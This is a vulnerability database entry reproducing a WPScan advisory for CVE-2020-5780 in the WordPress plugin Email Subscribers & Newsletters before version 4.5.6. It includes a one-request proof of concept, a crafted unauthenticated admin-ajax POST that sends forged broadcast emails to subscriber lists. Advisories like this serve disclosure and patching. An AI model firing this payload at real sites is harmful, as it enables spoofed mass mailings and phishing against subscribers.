Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:CF3F71C2-6DE2-4C8C-B7C4-29A63971777D
HistorySep 10, 2020 - 12:00 a.m.

Email Subscribers & Newsletters < 4.5.6 - Unauthenticated email forgery/spoofing

2020-09-1000:00:00
wpscan.com
13

0.003 Low

EPSS

Percentile

69.1%

JSON

It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 222 action=admin_init&broadcast;_data[id]=999&ig;_es_broadcast_submitted=submitted&broadcast;_data[subject]=test999&broadcast;_data[body]=body-content&broadcast;_data[list_ids]=2&broadcast;_data[meta][scheduling_option]=schedule_now

CPENameOperatorVersion
email-subscriberslt4.5.6

Related

threatpost 1
nvd 1
wpexploit 1
cve 1
openvas 1
cvelist 1
prion 1
nessus 1
threatpost
threatpost
WordPress Plugin Flaw Allows Attackers to Send Forged Emails
2020-09-11 16:34:02
nvd
nvd
CVE-2020-5780
2020-09-10 15:15:32
wpexploit
wpexploit
Email Subscribers & Newsletters < 4.5.6 - Unauthenticated email forgery/spoofing
2020-09-10 00:00:00
cve
cve
CVE-2020-5780
2020-09-10 15:15:32
openvas
openvas
WordPress Email Subscribers Plugin < 4.5.6 Email Forgery Vulnerability
2020-09-14 00:00:00
cvelist
cvelist
CVE-2020-5780
2020-09-10 14:10:03
prion
prion
Design/Logic Flaw
2020-09-10 15:15:00
nessus
nessus
WordPress Plugin 'Email Subscribers & Newsletters' < 4.5.6 Email Forgery/Spoofing Vulnerability.
2020-09-14 00:00:00

0.003 Low

EPSS

Percentile

69.1%

JSON
Related for WPVDB-ID:CF3F71C2-6DE2-4C8C-B7C4-29A63971777D
threatpost1nvd1wpexploit1cve1openvas1cvelist1prion1nessus1